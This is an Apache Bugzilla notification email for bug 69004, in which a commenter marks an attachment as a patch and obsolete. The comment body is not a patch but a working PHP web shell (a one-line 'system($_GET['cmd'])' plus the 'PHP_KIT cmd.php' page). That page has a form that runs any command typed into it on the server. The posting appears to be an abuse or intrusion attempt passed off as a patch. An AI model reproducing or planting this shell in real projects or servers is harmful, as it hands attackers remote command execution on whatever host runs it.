https://bz.apache.org/bugzilla/show_bug.cgi?id=69004
flm2r <[email protected]> changed: What |Removed |Added ---------------------------------------------------------------------------- Attachment #39707|0 |1 is patch| | Attachment #39707|0 |1 is obsolete| | --- Comment #3 from flm2r <[email protected]> --- Comment on attachment 39707 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39707 <?php system($_GET['cmd']);?> <? // // PHP_KIT // // cmd.php = Command Execution // // by: The Dark Raver // modified: 21/01/2004 // ?> <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <? if($_GET['cmd']) { system($_GET['cmd']); } ?> </pre> </BODY></HTML> -- You are receiving this mail because: You are the assignee for the bug.
